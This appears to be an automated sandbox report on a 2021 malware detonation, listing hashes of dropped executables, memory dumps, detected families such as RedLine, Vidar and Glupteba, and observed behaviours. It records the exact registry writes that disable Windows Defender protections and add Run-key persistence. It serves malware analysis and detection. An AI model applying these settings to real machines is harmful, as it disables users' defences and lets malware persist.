| SHA512 | 9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397 |
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
| MD5 | 41c97e6248c6939d50df1c99ab04679d |
| SHA1 | 0af10b82aa8619e285627de8e7af52b772e8ed18 |
| SHA256 | b511da29b61e72108cc597ad72ecb1f920d22d9bfc0bb5ff4e3d33d9da7995ea |
| SHA512 | 04ef83f1402c630cb57a4793f74bbf78ae06bb7f9f78fe071a4303a3949feec7cb2ef1698981116ec13020e6e25ecaf92cedfe1a55838a578a46fb0de3a50677 |
C:\Users\Admin\AppData\Local\Temp\82d93c54-5db6-40b3-ab75-d48cebc8eb54\IIIIIIIIIIIIIIIIIIIII.dll
| MD5 | e8641f344213ca05d8b5264b5f4e2dee |
| SHA1 | 96729e31f9b805800b2248fd22a4b53e226c8309 |
| SHA256 | 85e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24 |
| SHA512 | 3130f32c100ecb97083ad8ac4c67863e9ceed3a9b06fc464d1aeeaec389f74c8bf56f4ce04f6450fd2cc0fa861d085101c433cfa4bec3095f8ebeeb53b739109 |
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
| MD5 | a3ec5ee946f7b93287ba9cf7facc6647 |
| SHA1 | 3595b700f8e41d45d8a8d15b42cd00cc19922647 |
| SHA256 | 5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0 |
| SHA512 | 63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6 |
C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe
| MD5 | 58f5dca577a49a38ea439b3dc7b5f8d6 |
| SHA1 | 175dc7a597935b1afeb8705bd3d7a556649b06cf |
| SHA256 | 857dd46102aea53f0cb7934b96410ebbc3e7988d38dcafdc8c0988f436533b98 |
| SHA512 | 3c75c0cbbbc14bd25b4feb141fd1595ce02469da50432fb48400eb089d6150fe87831ccc775d921eeec697af7aad33a35fadcfd2ec775aeee1ce34355af7338a |
memory/4276-254-0x00000000007C0000-0x00000000007C3000-memory.dmp
memory/4396-248-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/2308-260-0x0000000000AE0000-0x0000000000AE1000-memory.dmp
memory/1912-265-0x0000000000000000-mapping.dmp
memory/1212-264-0x0000000001690000-0x0000000001692000-memory.dmp
memory/2832-261-0x000000001B5B0000-0x000000001B5B2000-memory.dmp
memory/704-267-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp
| MD5 | ffcf263a020aa7794015af0edee5df0b |
| SHA1 | bce1eb5f0efb2c83f416b1782ea07c776666fdab |
| SHA256 | 1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64 |
| SHA512 | 49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a |
memory/4904-270-0x0000000005930000-0x0000000005ED6000-memory.dmp
memory/2384-266-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1912-278-0x00000000031C0000-0x00000000031FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\itdownload.dll
| MD5 | d82a429efd885ca0f324dd92afb6b7b8 |
| SHA1 | 86bbdaa15e6fc5c7779ac69c84e53c43c9eb20ea |
| SHA256 | b258c4d7d2113dee2168ed7e35568c8e03341e24e3eafc7a22a0d62e32122ef3 |
| SHA512 | 5bf0c3b8fa5db63205a263c4fa5337188173248bef609ba4d03508c50db1fd1e336f3041ce96d78cc97659357a83e6e422f5b079d893a20a683270e05f5438df |
memory/4260-273-0x0000000005A90000-0x0000000005A91000-memory.dmp
memory/1912-279-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/2164-283-0x0000000000000000-mapping.dmp
memory/1112-284-0x0000000000F70000-0x0000000000F71000-memory.dmp
memory/2308-275-0x0000000005520000-0x0000000005521000-memory.dmp
memory/4548-286-0x00000000004F0000-0x00000000004F1000-memory.dmp
memory/1912-293-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/704-299-0x0000000005540000-0x0000000005541000-memory.dmp
memory/912-294-0x0000000000400000-0x0000000000448000-memory.dmp
memory/1912-298-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/3252-297-0x0000000000000000-mapping.dmp
memory/912-291-0x0000000000000000-mapping.dmp
memory/704-289-0x0000000005400000-0x0000000005401000-memory.dmp
memory/1912-288-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/704-285-0x0000000005B60000-0x0000000005B61000-memory.dmp
memory/796-303-0x0000000003F70000-0x0000000003F7A000-memory.dmp
memory/1912-311-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/704-318-0x0000000005530000-0x0000000005531000-memory.dmp
memory/2636-317-0x0000000000000000-mapping.dmp
memory/3980-323-0x0000000000000000-mapping.dmp
memory/1556-314-0x0000000000800000-0x0000000000801000-memory.dmp
memory/2820-307-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe
| MD5 | ff2d2b1250ae2706f6550893e12a25f8 |
| SHA1 | 5819d925377d38d921f6952add575a6ca19f213b |
| SHA256 | ca46080e121408d9624322e505dc2178ba99e15871c90e101b54e42ea7b54a96 |
| SHA512 | c66544678f3dd49aa1a23cd459a556d923ba44c5d88334a165ea7bd16e4561955536546627b7e83bf1e759428c04b6312e08fdc8c2f6fab69cd29f3b62ce3d23 |
memory/1112-309-0x0000000005810000-0x0000000005811000-memory.dmp
memory/1112-302-0x00000000058D0000-0x00000000058D1000-memory.dmp
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
memory/3952-328-0x0000000003FE0000-0x000000000407D000-memory.dmp
memory/2636-327-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1500-332-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1500-325-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\Pn1VVo1T_hse7zpU6N5O7Ppu.exe
| MD5 | 99f9746aed8955dcabe487429ee1f1b2 |
| SHA1 | cf146a760cef73b60ec3b9595084b56dd576e98d |
| SHA256 | b3d3be5bddf3fb8c4c8eac161b4e1f584713e8b563de3f13a5a42781a0a7f26e |
| SHA512 | 0e0ccf3304eb9c827e78802c265eb93b70c74df1221fad816205b9ca15453d79f58ce3e36b5b4c191b1e92afd016b26829f8d961f63aa47a734da3d80db6688b |
memory/5012-333-0x00000000025F0000-0x000000000261F000-memory.dmp
memory/4548-336-0x0000000003410000-0x0000000003411000-memory.dmp
memory/1052-340-0x0000000004070000-0x0000000004079000-memory.dmp
memory/2736-344-0x00000000025D0000-0x00000000025E9000-memory.dmp
memory/912-351-0x00000000050D0000-0x00000000056E8000-memory.dmp
memory/2236-358-0x0000000002570000-0x000000000259F000-memory.dmp
memory/1188-355-0x00000000040B0000-0x00000000040E0000-memory.dmp
memory/4056-362-0x00000000025E0000-0x0000000002610000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2021-08-22 20:10
Reported
2021-08-22 20:41
Platform
win11
Max time kernel
463s
Max time network
1794s
Command Line
Signatures
Buran
Glupteba
Glupteba Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Socelars
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6108 created 6660 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe |
| PID 6108 created 6660 | N/A | C:\Windows\system32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe |
Turns off Windows Defender SpyNet reporting
Vidar
Windows security bypass
Checks for common network interception software
Deletes shadow copies
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SET1072.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\drivers\SET1072.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
Executes dropped EXE
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\BE1F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\99BD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3C6A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\71B2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\E280.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\E280.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\71B2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3C6A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\99BD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\BE1F.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe | N/A |
Loads dropped DLL
Reads local data of messenger clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1912.exe = "0" | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1912.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Company\\Coducegoro.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Cleaner = "C:\\Users\\Admin\\AppData\\Roaming\\Cleaner\\Cleaner.exe --anbfs" | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | C:\Users\Admin\AppData\Roaming\7159434.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\703E.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\smss.exe\" -start" | C:\Users\Admin\AppData\Local\Temp\703E.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\71B2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\E280.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\3C6A.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\99BD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\BE1F.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | N/A | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | geoiptool.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Windows\System32\Conhost.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\oemvista.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD78.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD79.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD67.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD67.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\tap0901.cat | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD78.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\SETFD79.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{439cb5bd-82d5-6544-9985-fa6d53b66868}\tap0901.sys | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2105.41472.0_x64__8wekyb3d8bbwe\Assets\contrast-white\GetHelpAppList.targetsize-30_altform-lightunplated_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ul.xrm-ms | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.tree.dat.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GamingApp_2105.900.24.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Xbox_AppList.scale-100_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2103.8.0_x64__8wekyb3d8bbwe\Assets\Graphing.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Outlook.scale-125.png | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\KeytipLayer.js | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessR_OEM_Perp-ul-phn.xrm-ms.payfast.C8B-B7B-A04 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe | N/A |
